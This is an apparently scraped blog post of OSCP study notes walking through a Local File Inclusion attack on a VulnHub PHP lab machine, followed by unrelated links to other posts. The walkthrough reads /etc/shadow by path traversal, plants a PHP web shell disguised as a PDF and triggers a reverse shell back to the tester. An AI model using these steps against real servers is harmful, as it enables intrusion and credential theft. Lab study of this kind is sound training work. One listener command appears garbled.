Local File Inclusion[LFI]

Target Pentester Lab: Download from the following website:

https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

1. Use netdiscover to find the IP of the target server.  The IP address of the target server is 10.0.0.22.

netdiscover

2. Click different buttons of the website, and watch the change of the URL.           page= XXXX

3. Scan the target website using the tool nikto.

nikto -h 10.0.0.22

4.Change the URL to "http://10.0.0.22/index.php?page=../../etc/shadow%00", and press enter.  We can find the following warning message.

5. Return to the submit page. Find that we can upload pdf files to the website.

6. Make a shell.pdf file and save it.

%PDF-1.4

<?php

      system($_GET["cmd"]);

?>

7. Upload the shell.pdf to target website.

8.Change the URL to the following type with shell commands.

http://10.0.0.22/index.php?page=uploads/shell.pdf%00&cmd=whoami

http://10.0.0.22/index.php?page=uploads/shell.pdf%00&cmd=pwd

9 Down load a web-shells from the following website.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

10.Modify the web-shell file. ①Add the PDF tag. ②Change the ip and port.

11.Copy the php shell file as shell2.pdf. And upload this file to the website.

cp php-reverse-shell.php shell2.pdf

12. Listening the port 4444 on Linux

nv -nvlp

13.Browse the following URL through Firefox.

http://10.0.0.22/index.php?page=uploads/shell2.pdf%00

14. Then we can use the shell command we like on the terminal.

OSCP Learning Notes - WebApp Exploitation(4)的更多相关文章

  1. OSCP Learning Notes - WebApp Exploitation(5)

    Remote File Inclusion[RFI] Prepare: Download the DVWA from the following website and deploy it on yo ...

  2. OSCP Learning Notes - WebApp Exploitation(3)

    SQL Injection[SQLi] Refrence: SQL Injection Authentication Bypass Cheat Sheet https://pentestlab.blo ...

  3. OSCP Learning Notes - WebApp Exploitation(2)

    Cross-Site Scripting(XSS) 1. Using the tool - netdiscover to find the IP of target server. netdiscov ...

  4. OSCP Learning Notes - WebApp Exploitation(1)

    Installing XSS&MySQL FILE Download the Pentester Lab: XSS and MySQL FILE from the following webs ...

  5. OSCP Learning Notes - Post Exploitation(2)

    Windows Post Exploitation Target Server: IE8-Win 7 VM 1. Download and upload the fgdump, PwDump7, wc ...

  6. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  7. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  8. OSCP Learning Notes - Post Exploitation(3)

    Post-Exploit Password Attacks 1. Crack using the tool - john (Too slow in real world) Locate the roc ...

  9. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

随机推荐

  1. Eureka心跳健康检查机制和Spring boot admin 节点状态一直为DOWN的排查(忽略某一个节点的健康检查)

    https://www.jdon.com/springcloud/eureka-health-monitoring.html 运行阶段执行健康检查的目的是为了从Eureka服务器注册表中识别并删除不可 ...

  2. JavaWeb网上图书商城完整项目--day02-8.提交注册表单功能之dao、service实现

    1.发送邮件 发送邮件的时候的参数我们都写在了配置文件中,配置文件放在src目录下,可以使用类加载器进行加载该数据 //向注册的用户发送邮件 //1读取配置文件 Properties properti ...

  3. JavaWeb网上图书商城完整项目-数据库操作工具类

    1.首先安装数据库,在windows上安装和在unix上面安装环境不一样,我在自己的本地电脑上安装,安装成功之后,如果使用navicat远程工具访问,需要允许mysql远程能被访问 方法二.直接授权( ...

  4. SpringMVC 学习笔记(7)spring和springmvc的整合

    58. 尚硅谷_佟刚_SpringMVC_Spring整合SpringMVC_解决方案.avi 解决办法让springmvc值扫描@Control控制层和@ControllerAdvice对应的异常处 ...

  5. 【Spring】AOP的代理默认是Jdk还是Cglib?

    菜瓜:你觉得AOP是啥 水稻:我觉得吧,AOP是对OOP的补充.通常情况下,OOP代码专注功能的实现,所谓面向切面编程,大多数时候是对某一类对象的方法或者功能进行增强或者抽象 菜瓜:我看你这个理解就挺 ...

  6. 弹性配置为构建提速 - CODING & 腾讯云 CVM 最佳实践

    CODING 中提供了内置云主机用来执行持续集成(CI)中的构建计划,能够胜任大部分构建任务.但如果碰上了大型项目的构建,或者需要在本地服务器生成构建成果,单个计算资源就显得有点捉急了.针对这一部分需 ...

  7. 关于数据库客户端navicat创建新连接失败的问题

    如图是navicat创建新连接的截图: 我就有一个疑问了,主机填localhost或者127.0.0.1都是本机,自然是可以连接成功的,那如果填本机的IP地址会怎样呢? 如下图,出现了报错: 说我的访 ...

  8. 洛谷P1220关路灯【区间dp】

    题目描述 某一村庄在一条路线上安装了 \(n\) 盏路灯,每盏灯的功率有大有小(即同一段时间内消耗的电量有多有少).老张就住在这条路中间某一路灯旁,他有一项工作就是每天早上天亮时一盏一盏地关掉这些路灯 ...

  9. 解决autocomplete=off在Chrome中不起作用的方法

    大家都知道autocomplete属性是表单字段中的HTML5新属性,该属性有两种状态值,分别为"on" 和 "off",该属性可省略:省略属性值后默认值为&q ...

  10. go实现爬虫

    条件:1.第三方包github.com/tebeka/selenium,selenium自动化测试工具2.google驱动chromedriver.exe,要与本地浏览器的版本号对应,下载:http: ...